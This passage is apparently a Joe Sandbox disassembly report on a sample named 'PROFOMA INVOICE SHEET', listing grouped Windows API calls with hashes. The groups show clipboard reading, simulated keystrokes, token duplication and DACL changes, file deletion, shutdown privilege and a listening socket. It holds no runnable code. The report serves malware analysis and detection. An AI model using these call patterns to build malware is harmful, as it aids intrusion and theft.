                                    • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0039494B
                                    • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0039495C
                                    • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0039497B
                                    • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 003949AE
                                    • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 003949D4
                                    • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00394A0F
                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00394A56
                                    • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00394A7E
                                    • IsMenu.USER32(?), ref: 00394A97
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00394AF2
                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00394B20
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00394B94
                                    • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00394BE3
                                    • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00394C82
                                    • wsprintfW.USER32 ref: 00394CAE
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00394CC9
                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00394CF1
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00394D13
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00394D33
                                    • GetWindowTextW.USER32(?,00000000,00000001), ref: 00394D5A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                    • String ID: %d/%02d/%02d
                                    • API String ID: 4054740463-328681919
                                    • Opcode ID: ef7af9eb6b9676049236ab4dca91929776494200f403e6496c93cbccc7b98d5b
                                    • Instruction ID: e37b3c322e8352a95d35950296d033616e50eb554f5b0fda58b6fa8068808188
                                    • Opcode Fuzzy Hash: ef7af9eb6b9676049236ab4dca91929776494200f403e6496c93cbccc7b98d5b
                                    • Instruction Fuzzy Hash: D712D071600215ABEF269F28CC49FAEBBF8EF45710F14412AF516EB2E1DB749942CB50
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0031F998
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0035F474
                                    • IsIconic.USER32(00000000), ref: 0035F47D
                                    • ShowWindow.USER32(00000000,00000009), ref: 0035F48A
                                    • SetForegroundWindow.USER32(00000000), ref: 0035F494
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0035F4AA
                                    • GetCurrentThreadId.KERNEL32 ref: 0035F4B1
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0035F4BD
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0035F4CE
                                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 0035F4D6
                                    • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0035F4DE
                                    • SetForegroundWindow.USER32(00000000), ref: 0035F4E1
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0035F4F6
                                    • keybd_event.USER32(00000012,00000000), ref: 0035F501
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0035F50B
                                    • keybd_event.USER32(00000012,00000000), ref: 0035F510
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0035F519
                                    • keybd_event.USER32(00000012,00000000), ref: 0035F51E
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0035F528
                                    • keybd_event.USER32(00000012,00000000), ref: 0035F52D
                                    • SetForegroundWindow.USER32(00000000), ref: 0035F530
                                    • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0035F557
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 4125248594-2988720461
                                    • Opcode ID: 070065ad943dc3b25039968d2be3d94687a8b36de25ee0aef52d7b56e7d77eb4
                                    • Instruction ID: a458985fa159b406baf1161bb7f50cd9358e2429c29c4f2141ca545afed06f73
                                    • Opcode Fuzzy Hash: 070065ad943dc3b25039968d2be3d94687a8b36de25ee0aef52d7b56e7d77eb4
                                    • Instruction Fuzzy Hash: 6431A771A50318BFEB226BB65C4AFBF7E6CEB45B50F111426FA00E71D1D7B15D00AAA0
                                    APIs
                                      • Part of subcall function 003616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0036170D
                                      • Part of subcall function 003616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0036173A
                                      • Part of subcall function 003616C3: GetLastError.KERNEL32 ref: 0036174A
                                    • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00361286
                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 003612A8
                                    • CloseHandle.KERNEL32(?), ref: 003612B9
                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 003612D1
                                    • GetProcessWindowStation.USER32 ref: 003612EA
                                    • SetProcessWindowStation.USER32(00000000), ref: 003612F4
                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00361310
                                      • Part of subcall function 003610BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,003611FC), ref: 003610D4
                                      • Part of subcall function 003610BF: CloseHandle.KERNEL32(?,?,003611FC), ref: 003610E9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                    • String ID: $default$winsta0$Z<
                                    • API String ID: 22674027-3701828379
                                    • Opcode ID: 140c4ee1be6791569d248f97af2bed809ba8dca1cddd2e526387bd59f83a95ba
                                    • Instruction ID: 4e0a83b68863ca5839cb7c2ca4dc5b33af83a729b40062236898193f361cf30d
                                    • Opcode Fuzzy Hash: 140c4ee1be6791569d248f97af2bed809ba8dca1cddd2e526387bd59f83a95ba
                                    • Instruction Fuzzy Hash: D081AD71900209AFDF239FA5DC49FEE7BBDEF04704F18812AF910A62A4DB718944CB21
                                    APIs
                                      • Part of subcall function 003610F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00361114
                                      • Part of subcall function 003610F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 00361120
                                      • Part of subcall function 003610F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 0036112F
                                      • Part of subcall function 003610F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 00361136
                                      • Part of subcall function 003610F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0036114D
                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00360BCC
                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00360C00
                                    • GetLengthSid.ADVAPI32(?), ref: 00360C17
                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00360C51
                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00360C6D
                                    • GetLengthSid.ADVAPI32(?), ref: 00360C84
                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00360C8C
                                    • HeapAlloc.KERNEL32(00000000), ref: 00360C93
                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00360CB4
                                    • CopySid.ADVAPI32(00000000), ref: 00360CBB
                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00360CEA
                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00360D0C
                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00360D1E
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00360D45
                                    • HeapFree.KERNEL32(00000000), ref: 00360D4C
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00360D55
                                    • HeapFree.KERNEL32(00000000), ref: 00360D5C
                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00360D65
                                    • HeapFree.KERNEL32(00000000), ref: 00360D6C
                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00360D78
                                    • HeapFree.KERNEL32(00000000), ref: 00360D7F
                                      • Part of subcall function 00361193: GetProcessHeap.KERNEL32(00000008,00360BB1,?,00000000,?,00360BB1,?), ref: 003611A1
                                      • Part of subcall function 00361193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00360BB1,?), ref: 003611A8
                                      • Part of subcall function 00361193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00360BB1,?), ref: 003611B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                    • String ID:
                                    • API String ID: 4175595110-0
                                    • Opcode ID: 893bc45de6c1a33874ac3393caeb40bfbef4ca6d290075985867ea59c8937fb8
                                    • Instruction ID: 7ffa20970d75c379b84f240480246657fcf8dc028e66e0bfe6410466274b6277
                                    • Opcode Fuzzy Hash: 893bc45de6c1a33874ac3393caeb40bfbef4ca6d290075985867ea59c8937fb8
                                    • Instruction Fuzzy Hash: 40715A7290020AAFDF16DFA4DC45BAFBBBCBF05300F058616E915A6295D772EA05CB60
                                    APIs
                                    • OpenClipboard.USER32(0039CC08), ref: 0037EB29
                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0037EB37
                                    • GetClipboardData.USER32(0000000D), ref: 0037EB43
                                    • CloseClipboard.USER32 ref: 0037EB4F
                                    • GlobalLock.KERNEL32(00000000), ref: 0037EB87
                                    • CloseClipboard.USER32 ref: 0037EB91
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0037EBBC
                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0037EBC9
                                    • GetClipboardData.USER32(00000001), ref: 0037EBD1
                                    • GlobalLock.KERNEL32(00000000), ref: 0037EBE2
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0037EC22
                                    • IsClipboardFormatAvailable.USER32(0000000F), ref: 0037EC38
                                    • GetClipboardData.USER32(0000000F), ref: 0037EC44
                                    • GlobalLock.KERNEL32(00000000), ref: 0037EC55
                                    • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0037EC77
                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0037EC94
                                    • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0037ECD2
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0037ECF3
                                    • CountClipboardFormats.USER32 ref: 0037ED14
                                    • CloseClipboard.USER32 ref: 0037ED59
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                    • String ID:
                                    • API String ID: 420908878-0
                                    • Opcode ID: 466db91c12a13a8f35c1ee3fb045a0a668695d76019e213fa4cd53cff87dd66e
                                    • Instruction ID: cad70e72f3a88232263c59b1b28e602153883f9b1e638e1ba48785c7c76501b2
                                    • Opcode Fuzzy Hash: 466db91c12a13a8f35c1ee3fb045a0a668695d76019e213fa4cd53cff87dd66e
                                    • Instruction Fuzzy Hash: 4A61E6352043019FD322DF24D895F2A7BE8AF88704F05959EF45A9B2E2DB35DD05CB62
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 003769BE
                                    • FindClose.KERNEL32(00000000), ref: 00376A12
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00376A4E
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00376A75
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00376AB2
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00376ADF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                    • API String ID: 3830820486-3289030164
                                    • Opcode ID: 1e4e3f96e95f5adb6aca2e76d5de281738c86d4d530217fdc231aa82264f64f7
                                    • Instruction ID: d4c813db81269adb5ebadc462deafdcf8ce7eb110eec2cbbf46a636d3dc95177
                                    • Opcode Fuzzy Hash: 1e4e3f96e95f5adb6aca2e76d5de281738c86d4d530217fdc231aa82264f64f7
                                    • Instruction Fuzzy Hash: ABD185B1509340AFC715EB64C8A2EAFB7ECAF88704F44491EF589DB191EB34DA44C762
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00379663
                                    • GetFileAttributesW.KERNEL32(?), ref: 003796A1
                                    • SetFileAttributesW.KERNEL32(?,?), ref: 003796BB
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 003796D3
                                    • FindClose.KERNEL32(00000000), ref: 003796DE
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 003796FA
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0037974A
                                    • SetCurrentDirectoryW.KERNEL32(003C6B7C), ref: 00379768
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00379772
                                    • FindClose.KERNEL32(00000000), ref: 0037977F
                                    • FindClose.KERNEL32(00000000), ref: 0037978F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                    • String ID: *.*
                                    • API String ID: 1409584000-438819550
                                    • Opcode ID: 837a362139f7eaade6228959cc4a588117573fe597404f5fcb47b22d6d3ddc06
                                    • Instruction ID: e32890ec7def991f0ef137f53d860630b19aff9d60cb85b7e6adbd6143f07948
                                    • Opcode Fuzzy Hash: 837a362139f7eaade6228959cc4a588117573fe597404f5fcb47b22d6d3ddc06
                                    • Instruction Fuzzy Hash: E231C3325412596BDF26EFB4EC49FDE77AC9F09320F118657F809E2190DB39DE408A20
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 003797BE
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00379819
                                    • FindClose.KERNEL32(00000000), ref: 00379824
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00379840
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00379890
                                    • SetCurrentDirectoryW.KERNEL32(003C6B7C), ref: 003798AE
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 003798B8
                                    • FindClose.KERNEL32(00000000), ref: 003798C5
                                    • FindClose.KERNEL32(00000000), ref: 003798D5
                                      • Part of subcall function 0036DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0036DB00
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                    • String ID: *.*
                                    • API String ID: 2640511053-438819550
                                    • Opcode ID: 6d1b1357091d2a62ba9e3a3433bb8d2cf29bfdc6779405badafe5b5d50b02a17
                                    • Instruction ID: 5a83f1e84e5a2ac3e7529bad14359e6ed08eb79fbcf22c12dfbb1ec702e2030a
                                    • Opcode Fuzzy Hash: 6d1b1357091d2a62ba9e3a3433bb8d2cf29bfdc6779405badafe5b5d50b02a17
                                    • Instruction Fuzzy Hash: 4131D0325002197ADF22EFB4EC49BDE77AC9F06320F158697E858E2190DB39DE448B21
                                    APIs
                                    • GetLocalTime.KERNEL32(?), ref: 00378257
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00378267
                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00378273
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00378310
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00378324
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00378356
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0037838C
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00378395
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: CurrentDirectoryTime$File$Local$System
                                    • String ID: *.*
                                    • API String ID: 1464919966-438819550
                                    • Opcode ID: df639c865c0a21bbfff5480bca1ede2d14fcb6fe07b85b7228cf49e2ffa20755
                                    • Instruction ID: 713b13fb873947bc6892f69f232d872eb8f6e9e36be984756c20d63c058b2e98
                                    • Opcode Fuzzy Hash: df639c865c0a21bbfff5480bca1ede2d14fcb6fe07b85b7228cf49e2ffa20755
                                    • Instruction Fuzzy Hash: B5618C765043059FDB21EF64C8449AEB3E8FF89314F04891EF989CB251DB35E945CB92
                                    APIs
                                      • Part of subcall function 00303AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00303A97,?,?,00302E7F,?,?,?,00000000), ref: 00303AC2
                                      • Part of subcall function 0036E199: GetFileAttributesW.KERNEL32(?,0036CF95), ref: 0036E19A
                                    • FindFirstFileW.KERNEL32(?,?), ref: 0036D122
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0036D1DD
                                    • MoveFileW.KERNEL32(?,?), ref: 0036D1F0
                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 0036D20D
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 0036D237
                                      • Part of subcall function 0036D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0036D21C,?,?), ref: 0036D2B2
                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 0036D253
                                    • FindClose.KERNEL32(00000000), ref: 0036D264
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 1946585618-1173974218
                                    • Opcode ID: 5974e30d4367481f74c4944a2237d0011b313de53eb6ddf0166df2ade9408888
                                    • Instruction ID: 4baa7c317985fb13d086d87437f7717325d04755a3ce2f7f5e7f4c6e484f4acb
                                    • Opcode Fuzzy Hash: 5974e30d4367481f74c4944a2237d0011b313de53eb6ddf0166df2ade9408888
                                    • Instruction Fuzzy Hash: 5C615F31D0214D9FCF06EBE0D9A29EEB779AF55300F208565E4027B196EB319F09CB60
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                    • String ID:
                                    • API String ID: 1737998785-0
                                    • Opcode ID: fbc6e95fbdfba412596fc022c1824ac826a5f8a41e0c9321357f3f19912a2368
                                    • Instruction ID: eb4c461b5c35eb7e3572ce7cc61438c59ff34936b6eaa629ad313f94f3b9aa19
                                    • Opcode Fuzzy Hash: fbc6e95fbdfba412596fc022c1824ac826a5f8a41e0c9321357f3f19912a2368
                                    • Instruction Fuzzy Hash: 1341D435204611AFD722CF15E898F15BBE9FF48318F15C49AE4198FAA2C736EC41CB90
                                    APIs
                                      • Part of subcall function 003616C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0036170D
                                      • Part of subcall function 003616C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0036173A
                                      • Part of subcall function 003616C3: GetLastError.KERNEL32 ref: 0036174A
                                    • ExitWindowsEx.USER32(?,00000000), ref: 0036E932
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                    • String ID: $ $@$SeShutdownPrivilege
                                    • API String ID: 2234035333-3163812486
                                    • Opcode ID: d4d498b77fedadc7867126b8aa5ea08d82aa0a05e24989d6c206ca4f8d0709e7
                                    • Instruction ID: e1839223c8f49501fe273d9c2ee67631529a67b9c015de996a5d487c7d3acf1b
                                    • Opcode Fuzzy Hash: d4d498b77fedadc7867126b8aa5ea08d82aa0a05e24989d6c206ca4f8d0709e7
                                    • Instruction Fuzzy Hash: BF014E36620210AFFB5622749C86FBF73EC9F04740F158422FC13E21D5D7655C5481A0
                                    APIs
                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00381276
                                    • WSAGetLastError.WSOCK32 ref: 00381283
                                    • bind.WSOCK32(00000000,?,00000010), ref: 003812BA
                                    • WSAGetLastError.WSOCK32 ref: 003812C5
                                    • closesocket.WSOCK32(00000000), ref: 003812F4
                                    • listen.WSOCK32(00000000,00000005), ref: 00381303
                                    • WSAGetLastError.WSOCK32 ref: 0038130D
                                    • closesocket.WSOCK32(00000000), ref: 0038133C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
